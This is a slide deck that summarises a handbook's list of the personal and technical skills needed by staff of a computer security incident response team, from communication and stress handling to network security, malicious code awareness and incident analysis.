Basic skills


What Skills Are Needed When Staffing Your CSIRT?


Handbook for Computer Security Incident Response Teams

pages 23-35

personal and technical


The set of basic skills CSIRT staff members need to have 
are separated into two broad groups: 
personal skills and technical skills.

Personal


  • Communication
  • Presentation Skills
  • Diplomacy
  • Ability to Follow Policies and Procedures
  • Team Skills
  • Integrity
  • Knowing One's Limits
  • Coping with Stress
  • Problem Solving
  • Time Management

Communication


They need to be effective communicators to ensure that they obtain and supply the information necessary to be helpful. They need to be good listeners, understanding what is said (or not said) to enable them to gain details about an incident that is being reported. CSIRT staff must also remain in control of these communications to most effectively determine what is happening, what facts are important, and what assistance is necessary. They need to be able to adapt to the appropriate level of discussion without being condescending or talking above the comprehension level of the listener 

Written Communication

For many CSIRTs, a large part of its communication occurs through the written word. This communication can take many forms, including:
  • responses in email concerning incidents
  • documentation of event or incident reports, vulnerabilities, and other technical information
  • notifications and/or guidelines that are provided to the constituency
  • internal development of CSIRT policies and procedures
  • other external communications to staff, management, or other relevant parties

Oral Communication


Oral communication often occurs through telephone exchanges or face-to-face discussions and can involve a variety of individuals (system and network administrators (or other IT staff), management or other administrative staff, press/media/public relations staff, vendors etc). 
In some cases, selected members of the team may be primary contacts with the above groups and/or serve the role of "official spokesperson" for the CSIRT, presenting the mission and goals of the CSIRT, and speaking authoritatively about the services and activities undertaken by the team.

Presentation Skills


Although all CSIRT incident handling staff may interact daily with members of the constituency, they may not all be comfortable in front of a large audience or an audience of their peers. Moreover, staff may find themselves facing difficult, controversial, or potentially hostile situations that must be handled in a professional way; they need to be adept at effectively responding without harming the reputation of the CSIRT or offending others. Gaining confidence in presentation skills will take time and effort for staff members to become more experienced and comfortable in these situations.

Diplomacy

CSIRT staff members often find that the community with whom they interact may have a variety of goals and needs. This community may have varying levels of knowledge and degrees of excitement; some people may feel overwhelmed with the gravity of their situation; they may be anxious, frustrated, or angry. Still others may be aggressive or try to "trick" the CSIRT staff member into providing inappropriate information. Skilled CSIRT staff will be able to anticipate potential points of contention, be able to respond appropriately, maintain good relations, and avoid offending others. They also will understand that they are representing the CSIRT and/or their organization. Diplomacy and tact are essential

Ability to Follow 

Policies and Procedures

CSIRT staff should understand how and why the policies and procedures came into existence. To ensure a consistent and reliable incident response service, CSIRT staff must be prepared to accept and follow the rules and guidelines, even if these are not fully documented and regardless of whether the staff member personally agrees with them. 
On the other hand, if the staff feel strongly that change is required and if they want to approach management with suggested changes, they should be permitted to propose changes. 

Team Skills


CSIRT staff must be able to work in a team environment .
They must be flexible and willing to adapt to change. 
They also need team skills for interacting with other parties (for example, members of other incident response teams and other members of the organization, such as IT staff, site security officers, and network operators). 




An effective combination of technical ability and management/leadership skills is not easy to find. An individual can gain these skills over time, and some individuals may evolve into a leadership role as they gain experience and training. 

But it's important to recognize that 
technical leadership is not a skill 
that is suddenly available on demand 
after an individual has taken a leadership training class.

Integrity

The nature of CSIRT work means that the team members often deal with information that is sensitive and, occasionally, they might have access to information that is newsworthy. CSIRT staff must be trustworthy, discrete, and able to handle information in confidence. 
CSIRT staff may find themselves in a position where they know about information and could comment on a topic, but doing so could acknowledge or disclose information that was provided in confidence or that could affect an ongoing investigation.

Knowing One's Limits


Another important ability that CSIRT staff must have is to be able to readily admit when they have reached the limit of their own knowledge or expertise in a given area. However difficult it is to admit a limitation, individuals must recognize their limitations and actively seek support from their team members, other experts, or their management. Otherwise, the reputation of a team can be severely affected by a CSIRT staff member who has provided incorrect information or guidance to others.

Coping with Stress

CSIRT staff often find themselves in stressful situations. They need to be able to recognize when they are becoming stressed, be willing to make their fellow team members aware of the situation, and take (or seek help with) the necessary steps to control and maintain their composure. In particular, they need the ability to remain calm in tense situations—ranging from an excessive workload to an aggressive caller to an incident where human life or a critical infrastructure may be at risk. The team's reputation, and the individual's personal reputation, will be enhanced or will suffer depending on how such situations are handled.

Problem Solving


Without good problem-solving skills, staff members could become overwhelmed with the volumes of data related to incidents and other tasks that need to be handled. Problem-solving skills also include an ability for the CSIRT staff member to "think outside the box" or look at issues from multiple perspectives to identify relevant information or data.

Time Management


They will be confronted with a multitude of tasks ranging from analyzing, coordinating, and responding to incidents, to performing duties such as prioritizing their workload, attending and/or preparing for meetings, completing time sheets, collecting statistics, conducting research, giving briefings and presentations, traveling to conferences, and possibly providing onsite technical support.
<del>Some</del>times, even when they are given criteria for prioritizing tasks, staff may find it difficult to appropriately prioritize and manage the myriad responsibilities that they are assigned in accordance with those criteria.

TETHNICAL

The basic technical skills that CSIRT staff need have been separated into two categories: technical foundation skills and incident handling skills.

Technical foundation skills require a basic understanding of the underlying technologies used by the CSIRT and the constituency, as well as an understanding of issues that affect that team or constituency.
Incident handling skills require an understanding of the techniques, decision points, and supporting tools (software or applications) required in the daily performance of CSIRT activities.

Tehnical FOUNDATION


  • Security Principles
  • Security Vulnerabilities/Weaknesses
  • Risks
  • The Internet
  • Network Protocols
  • Network Applications and Services
  •  Network Security Issues
  • Host/System Security Issues
  • Malicious Code (Viruses, Worms, Trojan Horse programs)
  • Programming Skills

Incident Handling Skills

  • Local Team Policies and Procedures
  • Understanding/Identifying Intruder Techniques
  •  Communicating with Sites
  • Incident Analysis
  • Maintenance of Incident Records


Security Principles


  • confidentiality
  • availability
  • authentication
  • integrity
  • access control
  • privacy
  • non-repudiation

Security 

Vulnerabilities/Weaknesses


  • physical security issues
  • protocol design flaws (e.g., man-in-the-middle attacks, spoofing)
  • malicious code (e.g., viruses, worms, Trojan horses)
  • implementation flaws (e.g., buffer overflow, timing windows/race conditions)
  • configuration weaknesses
  • user errors or indifference

Risks


CSIRT staff members need to have a basic understanding of computer security risk analysis. They should understand the effects on their constituency of various types of risks (such as potentially widespread Internet attacks, national security issues as they relate to their team and constituency, physical threats, financial threats, loss of business, reputation, or customer confidence, and damage or loss of data). Newly hired CSIRT staff may not have this knowledge and will need guidance and mentoring to ensure they understand the risks that may affect the constituency being served, as well as any risks that might affect the CSIRT itself.

The Internet


At a minimum, CSIRT staff members should know about the history, philosophy, and structure of the internet, and the infrastructures that support it.
Without this fundamental background information, they will struggle or fail to understand other technical issues, such as the lack of security in underlying protocols and services used on the Internet or to anticipate the threats that might occur in the future.

 Network Protocols


Members of the CSIRT staff need to have a basic understanding of the common (or core) network protocols that are used by the team and the constituency they serve. For each protocol, they should have a basic understanding of the protocol, its specification, and how it is used. In addition, they should understand the common types of threats or attacks against the protocol, as well as strategies to mitigate or eliminate such attacks.

Network Applications and Services


CSIRT staff members need a basic understanding of the common network applications and services that the team and the constituency use (DNS, NFS, SSH, etc.).5 For each application or service, they should understand the purpose of the application or service, how it works, its common usages, secure configurations, and the common types of threats or attacks against the application or service, as well as mitigation strategies.

Network Security Issues


CSIRT staff members should have a basic understanding of the concepts of network security and be able to recognize vulnerable points in network configurations. They should understand the concepts and basic perimeter security of network firewalls (design, packet filtering, proxy systems, DMZ, bastion hosts, etc.), router security, potential for information disclosure of data traveling across the network (e.g., packet monitoring or "sniffers"), or threats relating to accepting untrustworthy information.

Host/System Security Issues


CSIRT staff need to understand security issues at a host level for the various types of operating systems (UNIX, Windows, or any other operating systems used by the team or constituency). Before understanding the security aspects, the CSIRT staff member must first have:

  • experience using the operating system (user security issues)
  • some familiarity with managing and maintaining the operating system (as an administrator)

for each operating system, the CSIRT staff member needs to know how to

  • configure (harden) the system securely
  • review configuration files for security weaknesses
  • identify common attack methods
  • determine if a compromise attempt occurred
  • determine if an attempted system compromise was successful
  • review log files for anomalies
  • analyze the results of attacks
  • manage system privileges
  • secure network daemons
  • recover from a compromise

Malicious Code 

(Viruses, Worms, Trojan Horse programs)

CSIRT staff must understand the different types of malicious code attacks that occur and how these can affect their constituency (system compromises, denial of service, loss of data integrity, etc.). Malicious code can have different types of payloads that can cause a denial of service attack or web defacement, or the code can contain more "dynamic" payloads that can be configured to result in multi-faceted attack vectors.


Staff should understand not only how malicious code is propagated through some of the obvious methods (disks, email, programs, etc.) but also how it can propagate through other means such as PostScript, Word macros, MIME, peer-to-peer file sharing, or boot-sector viruses that affect operating systems running on PC and Macintosh platforms. CSIRT staff must be aware of how such attacks occur and are propagated, the risks and damage associated with such attacks, prevention and mitigation strategies, detection and removal processes, and recovery techniques.

Programming Skills


Team members need to have system and network programming experience. The team should ensure that a range of programming languages is covered on the operating systems that the team and the constituency use.

These scripts or programming tools can be used to assist in the analysis and handling of incident information (e.g., writing different scripts for counting and sorting through various logs, searching databases, looking up information, extracting information from logs/files, collecting and merging data).


Additionally, CSIRT staff should understand the concepts of and techniques for secure programming. They need to be aware of how vulnerabilities can be introduced into code (e.g., through poor programming and design practices) and how to avoid these in any tools or products that they may develop for the team or their constituency.

Incident Handling Skills


Within the broad range of technical skills needed to undertake incident handling is a subset of skills the CSIRT staff also need. We call these "incident handling" skills, and they are associated with the underlying daily operational activities of the CSIRT. 
It is worth noting that while these underlying concepts relating to incident handling skills can be similar across many different CSIRTs, the specific implementation, policies, and procedures for how these concepts are applied will be very specific within each team (and based on other factors mentioned previously in the Introduction).

Local Team Policies and Procedures

The CSIRT incident handlers must be trained in the local policies and procedures that govern the operation of their team. Every aspect of the work will most likely lead back to a policy or procedure that must be followed or to other directives from management. CSIRT staff need this background information and must have a firm grasp of the guiding principles; otherwise, they won't understand the framework and boundaries in which they apply their range of skills and knowledge. Every CSIRT staff member must be able to support these policies and procedures, not only at the team level but also at an organizational level (or even any that are associated with the constituency they serve as it applies to their relationship with that constituency).

Understanding/Identifying 

Intruder Techniques


CSIRT incident handlers must be able to recognize known intrusion techniques based on the footprints or artifacts left by different types of attack in the incident reports they handle. 



Given real incident data, the incident handler should be able to use the knowledge that they have gathered from any existing documented analyses to identify the types of attack and recognize specific intruder tools or toolkits, techniques used, or other malicious code. With each type of attack, they should understand the associated risks and effects, the relative severity, and the mitigation, prevention, or recovery methods.



Another important incident handling skill is the analysis of and correlation between incidents to notice what has not been seen before (a new attack technique, footprint, intruder tool, attack vector). Being able to identify such abnormal (or unexpected) activity might lead to the recognition of new attacks or potential vulnerabilities that warrant further investigation or analysis (which might be undertaken by more senior members of the team or other experts). 


team members will require additional specialist skills and knowledge to be able to:

  • identify a new vulnerability
  • undertake technical analysis of intruder tools and techniques
  • recognize new intrusion techniques based on the footprints and their effects
  • document analyses of artifacts as reference material for other team members (this work might also extend to providing guidance to help other CSIRT staff identify footprints, associated risks, and prevention methods)

Communicating with Sites


Much of the communication undertaken by CSIRT incident handlers is conducted online, commonly through email. The correspondence often requires the transmittal of incident data in a secure manner. As a result, it is crucial that CSIRT staff be fully conversant in the use of email and MIME functionality, as well as tools and methods to identify contact information for other sites  

  • including understanding which points of contact are most appropriate 
  • and the appropriate encryption technologies to be used.

Incident Analysis


  • Who is involved?
  • What has happened?
  • Where did the attack originate from?
  • When (what time frame)?
  • Why did it happen?
  • How was the system vulnerable or how did the attack occur?
  • What was the reason for the attack?

Maintenance of Incident Records


It is an important process that should be integrated into the CSIRT operations and followed by all team members who are responsible for incident handling functions.

It is also very important that incident records are well documented, consistently maintained, and current. Doing so will give a clear picture of the current state of activity and what work remains. 

continuing education


Financial plans and budgets should include funds for sustaining the overall quality of the CSIRT. To enable CSIRT staff to keep pace with the changes in technology and usage, there should be an ongoing budgeting plan for continuing education or refresher courses so CSIRT staff can continue to be effective incident handlers. In addition, where appropriate, budget plans should also include funds to provide opportunities for professional development to further enhance the team members' knowledge and abilities, keep them engaged and energized about CSIRT work, and (at the same time) expand the overall capabilities of the team.

rizing bar



Just as CSIRTs evolve and need to adapt to change, 
we expect that over time, 
list such as this one will need to be revised 
as the "bar" is raised. 

Basic skills

By Hillar Aarelaid

Made with Slides.com

Basic skills

  • 1,494

More from Hillar Aarelaid